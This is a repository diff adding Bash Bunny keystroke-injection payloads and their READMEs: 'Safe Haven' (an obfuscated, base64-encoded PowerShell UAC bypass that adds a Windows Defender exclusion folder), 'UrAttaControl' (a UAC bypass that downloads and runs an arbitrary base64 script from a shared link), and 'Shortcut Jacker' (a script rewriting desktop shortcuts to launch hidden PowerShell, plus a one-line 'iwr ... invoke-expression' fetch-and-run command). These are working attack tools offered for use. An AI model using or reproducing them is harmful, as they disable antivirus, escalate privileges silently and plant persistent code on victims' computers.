@ -0,0 +1,97 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Safe Haven
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
## Description
This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

23
payloads/library/execution/-BB-SafeHaven/SafeHaven.txt Normal file
View File

@ -0,0 +1,23 @@
REM Title: Safe-Haven
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console
REM Next a Directory called "safe" will be generated in your Documents Directory
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
REM Target: Windows 10, 11
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
ENTER

21
payloads/library/execution/-BB-SafeHaven/payload.txt Normal file
View File

@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/SafeHaven.txt

144
payloads/library/execution/-BB-ShortcutJacker/README.md Normal file
View File

@ -0,0 +1,144 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Shortcut+Jacker!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Shortcut Jacker
<p align="left">
<a href="https://www.youtube.com/watch?v=sOLIdqpzrW4">
<img src=https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/SCJ-TV2.png width="300" alt="Python" />
</a>
<br>YouTube Tutorial
</p>
A script used to embed malware in the shortcut on your targets desktop
## Description
This payload will run a powershell script in the background of any shortcut used on the targets desktop
This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run.
So if your command exceeds that consider using an IWR function to download and execute a longer script.
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
---------------------------------------------------------------------------------------------------------------------------------------------------------
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/code.jpg" width="900">
---------------------------------------------------------------------------------------------------------------------------------------------------------
Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field.
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/shortcut.jpg" width="900">
## Getting Started
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
### Dependencies
* An internet connection
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/I_Am_Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/i_am_jakoby/">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="center">
<img src="https://raw.githubusercontent.com/bornmay/bornmay/Update/svg/Bottom.svg" alt="Github Stats" />
</p>

118
payloads/library/execution/-BB-ShortcutJacker/Shortcut-Jacker.ps1 Normal file
View File

@ -0,0 +1,118 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is payload used to inject powershell code into shortcuts
.DESCRIPTION
This payload will gather information on the shortcuts on your targets desktop
That data will then be manipulated to embed a powershell script
This script will be ran in the background when the short cut is
#>
############################################################################################################################################################
<#
.NOTES
The powershell code stored in this variable is what will run in the background
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
variable and it will still run.
#>
$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
############################################################################################################################################################
function Get-Shortcut {
param(
$path = $null
)
$obj = New-Object -ComObject WScript.Shell
if ($path -eq $null) {
$pathUser = [System.Environment]::GetFolderPath('StartMenu')
$pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
$path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
}
if ($path -is [string]) {
$path = dir $path -Filter *.lnk
}
$path | ForEach-Object {
if ($_ -is [string]) {
$_ = dir $_ -Filter *.lnk
}
if ($_) {
$link = $obj.CreateShortcut($_.FullName)
$info = @{}
$info.Hotkey = $link.Hotkey
$info.TargetPath = $link.TargetPath
$info.LinkPath = $link.FullName
$info.Arguments = $link.Arguments
$info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
$info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
$info.WindowStyle = $link.WindowStyle
$info.IconLocation = $link.IconLocation
return $info
}
}
}
#-----------------------------------------------------------------------------------------------------------
function Set-Shortcut {
param(
[Parameter(ValueFromPipelineByPropertyName=$true)]
$LinkPath,
$IconLocation,
$Arguments,
$TargetPath
)
begin {
$shell = New-Object -ComObject WScript.Shell
}
process {
$link = $shell.CreateShortcut($LinkPath)
$PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
Where-Object { $_.key -ne 'LinkPath' } |
ForEach-Object { $link.$($_.key) = $_.value }
$link.Save()
}
}
#-----------------------------------------------------------------------------------------------------------
function hijack{
$Link = $i.LinkPath
$Loc = $i.IconLocation
$TargetPath = $i.TargetPath
if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
$Target = $i.Target
if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
}
#-----------------------------------------------------------------------------------------------------------
Get-ChildItem Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}

20
payloads/library/execution/-BB-ShortcutJacker/payload.txt Normal file
View File

@ -0,0 +1,20 @@
REM Title: Shortcut-Jacker
REM Author: I am Jakoby
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Target: Windows 10, 11
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Shortcut-Jacker.ps1')"
QUACK ENTER

104
payloads/library/execution/-BB-UrAttaControl/README.md Normal file
View File

@ -0,0 +1,104 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# UrAttaControl
A script used to open an elevated powershell console and execute admin level commands
## Description
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
This script will use IEX to download a base64 script to the $Payload variable
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
script saved in the $Payload variable
This payload completely bypasses the UAC and will run any admin level script without a prompt
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

Some files were not shown because too many files have changed in this diff Show More